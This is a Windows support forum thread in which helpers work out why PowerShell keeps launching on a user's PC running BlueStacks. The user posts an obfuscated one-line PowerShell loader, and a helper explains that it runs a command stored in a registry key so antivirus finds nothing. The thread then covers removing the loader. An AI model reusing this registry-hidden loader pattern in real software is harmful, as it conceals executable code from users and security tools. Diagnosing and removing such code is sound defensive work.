Solved Powershell opening on it's own


flhthemi

Well-known member
Member
Local time
6:11 AM
Posts
44
OS
Windows 11 Pro
I use Bluestacks android emulator on my desktop PC. I like to sing so I use the StarMaker apk to karaoke online. It seems Starmaker will suddenly start getting laggy and it occurs right after I see a flash on my screen. Like that's when powershell opens. I'm NOT invoking it, but something is. I open Task manager and I can see it at the top of the list for memory usage.
I guess my question is does Win 11 require Powershell to run periodically as a maintenance thing and will it hurt to just use task manager to close it?
 
Windows Build/Version
22H2 OS Build 22621.1555 W/Explorer Patcher Currrent version

My Computer

System One

  • OS
    Windows 11 Pro
    Computer type
    PC/Desktop
    Manufacturer/Model
    N/A
    CPU
    AMD Phenom(tm) II X4 965 Processor 3.40 GHz
    Motherboard
    Gigabyte GA-770T USB3
    Memory
    12gb
    Graphics Card(s)
    Nvidia GTX950
    Sound Card
    Realtek 888
    Monitor(s) Displays
    Acer
    Screen Resolution
    1920x1080
    Hard Drives
    1TB SSD Vulcan Z
    Keyboard
    Logitech
    Internet Speed
    500
    Browser
    Firefox
    Antivirus
    Windows Defender
If you right-click on a Task manager, Processes tab column header you can add Command line as a column in order to see what PowerShell command or script is being run.
I'm not aware of any PowerShell maintenance tasks that might explain what you are seeing.


Best of luck,
Denis
 

My Computer

System One

  • OS
    Windows 11 Home x64 Version 23H2 Build 22631.3296
If you right-click on a Task manager, Processes tab column header you can add Command line as a column in order to see what PowerShell command or script is being run.
I'm not aware of any PowerShell maintenance tasks that might explain what you are seeing.


Best of luck,
Denis
I'll give that a try next time I see PS running, thanks
 

My Computer

System One

  • OS
    Windows 11 Pro
    Computer type
    PC/Desktop
    Manufacturer/Model
    N/A
    CPU
    AMD Phenom(tm) II X4 965 Processor 3.40 GHz
    Motherboard
    Gigabyte GA-770T USB3
    Memory
    12gb
    Graphics Card(s)
    Nvidia GTX950
    Sound Card
    Realtek 888
    Monitor(s) Displays
    Acer
    Screen Resolution
    1920x1080
    Hard Drives
    1TB SSD Vulcan Z
    Keyboard
    Logitech
    Internet Speed
    500
    Browser
    Firefox
    Antivirus
    Windows Defender
PS.jpg
This is what's making things lag for me. I have no idea why PS starts on it's own.
 

My Computer

System One

  • OS
    Windows 11 Pro
    Computer type
    PC/Desktop
    Manufacturer/Model
    N/A
    CPU
    AMD Phenom(tm) II X4 965 Processor 3.40 GHz
    Motherboard
    Gigabyte GA-770T USB3
    Memory
    12gb
    Graphics Card(s)
    Nvidia GTX950
    Sound Card
    Realtek 888
    Monitor(s) Displays
    Acer
    Screen Resolution
    1920x1080
    Hard Drives
    1TB SSD Vulcan Z
    Keyboard
    Logitech
    Internet Speed
    500
    Browser
    Firefox
    Antivirus
    Windows Defender
I suggest you browse to that folder
C:\Windows\System32\ED53.tmp
then make a copy of
ED54.tmp.ps1
then open a Notepad window and drop it onto there so you can read it without accidentally re-running it.
I'm only speculating but you might well find that that folder & that file only exist while you can see it running.

You might find something informative in it.
It looks suspicious to me.


Best of luck,
Denis
 

My Computer

System One

  • OS
    Windows 11 Home x64 Version 23H2 Build 22631.3296
Here's what was in it....Got no idea other than it looks like some code. I did do an offline defender scan. Nothing found there.

Code:
$ZzBPIYVoqkZY=[ScriptBlock]; icm ($ZzBPIYVoqkZY::Create([string]::Join('', ((gp (([regex]::Matches('mFNx2Vonstxn_skcatSeulB\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'hZciikS' | % { [char]$_ }))))
 

My Computer

System One

  • OS
    Windows 11 Pro
    Computer type
    PC/Desktop
    Manufacturer/Model
    N/A
    CPU
    AMD Phenom(tm) II X4 965 Processor 3.40 GHz
    Motherboard
    Gigabyte GA-770T USB3
    Memory
    12gb
    Graphics Card(s)
    Nvidia GTX950
    Sound Card
    Realtek 888
    Monitor(s) Displays
    Acer
    Screen Resolution
    1920x1080
    Hard Drives
    1TB SSD Vulcan Z
    Keyboard
    Logitech
    Internet Speed
    500
    Browser
    Firefox
    Antivirus
    Windows Defender
This script is reading a reg key which has a command string inside, and executing it. It's an old trick, separating the actual commands from the script so your A/V has nothing to find.

Open RegEdit and look at HKLM\Software\Bluestacks_nxtsnoV2xNfm
 

My Computer

System One

  • OS
    Windows 7
I was hoping that the code would identify its source [something like a line saying ### AMD Customisation script].

Its pattern matches the reported code in
Powershell windows popping up every day, just for a second. - MSAForum
where they say it is malware that no longer does anything because its domain was closed down.

The suggestion there is that you use MS SysInternals AutoRuns to stop it loading a scheduled task.
my list of AutoRuns links [post #16] - TenForums
my ditty - Notes about AutoRuns indicator colours [post #76] - TenForums


Best of luck,
Denis
 

My Computer

System One

  • OS
    Windows 11 Home x64 Version 23H2 Build 22631.3296
This script is reading a reg key which has a command string inside, and executing it. It's an old trick, separating the actual commands from the script so your A/V has nothing to find.

Open RegEdit and look at HKLM\Software\Bluestacks_nxtsnoV2xNfm
I removed it from the task scheduler.
Sooo...delete the reg key too?
 

My Computer

System One

  • OS
    Windows 11 Pro
    Computer type
    PC/Desktop
    Manufacturer/Model
    N/A
    CPU
    AMD Phenom(tm) II X4 965 Processor 3.40 GHz
    Motherboard
    Gigabyte GA-770T USB3
    Memory
    12gb
    Graphics Card(s)
    Nvidia GTX950
    Sound Card
    Realtek 888
    Monitor(s) Displays
    Acer
    Screen Resolution
    1920x1080
    Hard Drives
    1TB SSD Vulcan Z
    Keyboard
    Logitech
    Internet Speed
    500
    Browser
    Firefox
    Antivirus
    Windows Defender
I would export a copy to understand what harm it's trying to do, then delete the key.
 

My Computer

System One

  • OS
    Windows 7
I feel certain it's BlueStacks tracking key clicks to see what ads I click on or something like that. I have used task manager to stop it when it starts and haven't seen any detrimental results to BlueStacks. Like I say, I removed the task (which was scheduled to run every 8 hours) and I will delete the registry entry. The worst it appears in doing that would be BlueStacks would start having issues and that's not a big deal. I know I'm going to have to keep an eye on Bluestacks when I update it too as it may rewrite to the task scheduler.

And thanks very much for the assistance!! You guys are great! I know I could have never have figured this out.

EDIT I backed up the reg entry then deleted it. We'll see what happens....
 

My Computer

System One

  • OS
    Windows 11 Pro
    Computer type
    PC/Desktop
    Manufacturer/Model
    N/A
    CPU
    AMD Phenom(tm) II X4 965 Processor 3.40 GHz
    Motherboard
    Gigabyte GA-770T USB3
    Memory
    12gb
    Graphics Card(s)
    Nvidia GTX950
    Sound Card
    Realtek 888
    Monitor(s) Displays
    Acer
    Screen Resolution
    1920x1080
    Hard Drives
    1TB SSD Vulcan Z
    Keyboard
    Logitech
    Internet Speed
    500
    Browser
    Firefox
    Antivirus
    Windows Defender

Latest Support Threads

Back
Top Bottom